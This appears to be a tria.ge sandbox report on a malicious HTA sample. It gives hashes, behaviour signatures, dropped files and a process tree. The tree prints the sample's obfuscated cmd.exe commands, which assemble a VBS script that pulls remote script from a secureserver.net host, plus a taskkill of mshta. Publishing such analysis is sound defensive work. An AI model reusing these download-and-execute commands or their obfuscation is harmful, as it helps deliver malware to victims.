Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    29/08/2024, 09:23

General

  • Target

    test.hta

  • Size

    147B

  • MD5

    0144b746edf817419d3fe42b0c50fe92

  • SHA1

    f469ffccdf5213f4be17608d2b44d738a604b807

  • SHA256

    7e360e8b091aab014189554faeef805a3ae2ffd11124fd4ffdd827abf3be7306

  • SHA512

    da5447e4ea8313b7cfdc5bb7c3dffe8c21cf2ae5b07c653f0abd125415647f71330c84502f5a0eafdbd7b1a465d0de103ed9598e9183d6587f08299d0df683a2

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\test.hta"
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2144
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c "echo WLzi1c22="ri">C:\Users\Public\vvcH43.vbs&&echo IZ4u450="tp">>C:\Users\Public\vvcH43.vbs&&echo hMJQ6C71=".":OduoBTg12="sC" ^& WLzi1c22 ^& "pt:ht" ^& IZ4u450 ^& "s://">>C:\Users\Public\vvcH43.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3028
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c echo|set /p=^"OduoBTg12^=OduoBTg12 ^& ^"43"+hMJQ6C71+"244"+hMJQ6C71+"109"+hMJQ6C71+"208"+hMJQ6C71+"host"+hMJQ6C71+"secureserver"+hMJQ6C71+"net/g1^":GetO^">>C:\Users\Public\\vvcH43.vbs&echo|set /p=^"bject(^">>C:\Users\Public\\vvcH43.vbs
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2016
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2768
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" set /p="OduoBTg12=OduoBTg12 & "43"+hMJQ6C71+"244"+hMJQ6C71+"109"+hMJQ6C71+"208"+hMJQ6C71+"host"+hMJQ6C71+"secureserver"+hMJQ6C71+"net/g1":GetO" 1>>C:\Users\Public\\vvcH43.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2892
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2820
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" set /p="bject(" 1>>C:\Users\Public\\vvcH43.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:328
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c "echo _>>C:\Users\Public\\vvcH43.vbs&&echo OduoBTg12)>>C:\Users\Public\\vvcH43.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2772
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\\vvcH43.vbs
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2616
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\vvcH43.vbs"
        3⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2300
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /F /IM mshta.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1448

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\04788E6207035207B8930FC2CDD3C940

    Filesize

    504B

    MD5

    98df72bb54091099af3a2120b9f6786a

    SHA1

    7c629a82e6043390a067890565cafbfb6d6feb04

    SHA256

    565456ad44f24835fc8b4291cd293c15b5816bf3953221bf43439bb8d8c243ba

    SHA512

    e674e62a32f1ef57de54e9248a62a520827d005278e7f376d460ad76c17a989523fb351022def512f801e8bbc3c8d33882277d5091f5b27abbccda208e61ccb3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\04788E6207035207B8930FC2CDD3C940

    Filesize

    554B

    MD5

    657c8ac147a92f54cd4f0f1997accab0

    SHA1

    9b46849fadf27c222840e98aa8e8e9883d6d6c6f

    SHA256

    65b8b1a1dd569e7763c15cd8f3f6478eb61dcb0c0ad3cc1ec4ff4bf4b38f5afe

    SHA512

    4f2ffe225a14a4d67cf5216795dcd4af878d5c247e467b53729b3a273300177d224c68be0283d3b580d39b38dcbb64bf35cae24e6661b10e5c8c25559e10f3d2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    7201e109a2fc6dda1db0df301876a8db

    SHA1

    e1655d367b6e682195404a75214428cefe565c6e

    SHA256

    7c09aaa5ce46c82912bbb63b5a58f7902b935a260cf512c23a7eecd54ddf7255

    SHA512

    3e6d6e6f336db068ea2897c0cc4f14c4a0857eb90d38b9b18c286d3ed27ac505f6f31433ada59d2456c658711040db2c1729a191d0c091303bb3f84bc6a5e3c0

  • C:\Users\Admin\AppData\Local\Temp\CabE070.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Public\vvcH43.vbs

    Filesize

    98B

    MD5

    0cd354827105e75b556094e7de26cbb7

    SHA1

    4e51cd87dcc34fbc2eef24627bfb3ab79c9e2b72

    SHA256

    c999dc13194bdb0f517cbee4431c655761a2a96de29755e6f9f63de7931d5707

    SHA512

    958410f2173fd08adb726397194212f145aa2e8e3d13ae50c9d2968f29177202979aac106bb2651505a91e638947c56fc85fa11adda8e22a8c440ccf063e55fe

  • C:\Users\Public\vvcH43.vbs

    Filesize

    238B

    MD5

    e2a22af70bf4b9205ed04bc63fe04bc7

    SHA1

    e6cb55d932cf06de83495859e6e479d0dfc2b62a

    SHA256

    acdbdd62510404a1e90793bdb71adad7ac95e98b96b4a6122bcb9f8daaa1c8b9

    SHA512

    94e44876f80f293f5290c3a0333764e7f7c2e1334aafbc42e6b41db07d6d7b67aba1fface70840f1655c52774fef4b0d55948d7667f712cce4567d056a4fd7f9

  • C:\Users\Public\vvcH43.vbs

    Filesize

    241B

    MD5

    30b71cb46c0a264fbc232d429bc67ead

    SHA1

    64ea1a1778efa0a8dc5bef94af04b9b40b0856ea

    SHA256

    2b9ef78793c3383fa2c28fa2b4c2ddf2bbb8237b916c72007de97df31045db49

    SHA512

    07f40ae25a0ea15fede16e368419187d78ad98edf5d0637e9a0b9ce29181df072c0d3648b8e99dcb81a5809180df1a22c25c7ec04e82c7c6da89c0f675e9a1d9

  • C:\Users\Public\vvcH43.vbs

    Filesize

    253B

    MD5

    5df54ea4c54de9e8ad092eeac6026f9f

    SHA1

    eb6456597a1517df01a163393c660de6ff7206da

    SHA256

    9ce80b592750d0f78f35ac4215c1925ca6ee3161a9e4aa257a1cf0228952e3d5

    SHA512

    fe7f49ff04578bb209a39d84ef4530d7fe31cbdd70405d6c43eb9a571187e28ae7547843add6131ea9b24f469d02b3a884dff6d7a43e0b0a0cd819fc40c74fc3